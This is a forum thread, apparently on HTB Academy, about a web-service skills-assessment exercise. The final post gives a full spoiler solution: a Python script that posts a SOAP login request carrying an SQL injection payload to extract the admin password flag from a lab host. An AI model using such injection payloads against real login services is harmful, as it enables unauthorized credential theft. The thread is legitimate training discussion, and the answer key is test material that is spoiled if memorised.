Web Service & API Attacks - Skills Assessment

rootlikegr00t · August 1, 2024, 2:06am

If someone who understood this deeply still watch this topic, please DM me, I got the flag, but I don’t understand why it worked.

mvnhattan · September 4, 2024, 12:23am

I used OpenAI and asked “If I use this sub-select “…(SELECT password FROM users WHERE username = ‘admin’ LIMIT 1);” How do I change it so that it only returns a row where the password begins with “FLAG” ?”

It provided me a subquery with a wildcard that helped me get the flag.

charlocomse · September 18, 2024, 8:23pm

3hrs in and i still can’t find it, last exercise to finish the path, i crafted everything i could, automated, burp etc… i’m losing my mind if someone could help me please!

dispozablehero · September 19, 2024, 12:53pm

Holy moly I got it. I was completely lost most of this module. I feel like the author did a terrible job explaining things in this one. Most of the modules I do pretty well following along but this one was a nightmare.

Basically using the automate.py script they have in the earlier section and modifying it for Login requests rather than command executing and adding a very basic SQLi payload gave me the flag.

I did not care for this module at all and I hope they revist it and update it to be more clear in the instructions.

archymir · October 29, 2024, 2:39pm

Unfortunatelly, going to HTB Academy to learn something is not the the intended way; it’s just not how things work here. It’s common to get stuck on something trivial for hours and waste time on seemingly pointless tasks. But learning the hard way has its benefits too—you have the choice to find a better place or endure the challenges here.

For this challenge, you need to understand the main concept. This is still SQL injection, but it’s within a specific payload. Just as you would typically perform your actions in a browser’s input field, here you do the same thing, but within the specific payload format so the actuall goal here is to learn on how to “find” the correct payload …

SPOILER ALERT!

Full solution:

import requests

payload = '''<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:LoginRequest>
         <tem:username>admin' OR (SELECT password FROM users WHERE username = 'admin' AND password LIKE 'FLAG%')-- </tem:username>
         <tem:password>password</tem:password>
      </tem:LoginRequest>
   </soapenv:Body>
</soapenv:Envelope>'''

response = requests.post("http://10.10.10.10:302/wsdl", data=payload, headers={"SOAPAction": '"Login"'})
print(response.content)

Topic		Replies	Views
Blind SQL Injection Assessment Academy	8	619	October 29, 2024
Advanced SQL Injection Skills Assessment Academy	35	1715	September 14, 2024
HTB ACADEMY - Skills Assessment : SQL Injection Fundamentals Challenges sqli , sql-injection , academy , skills-assessment , injection	2	2038	April 23, 2021
academy sqlmap essentials case:10 Programming sql-injection , sqlmap , academy-help	21	3708	November 13, 2024
SQLi Fundamentals Module Final Assessment Exploits sql-injection , htb-academy	4	1502	February 6, 2022

Web Service & API Attacks - Skills Assessment

Related topics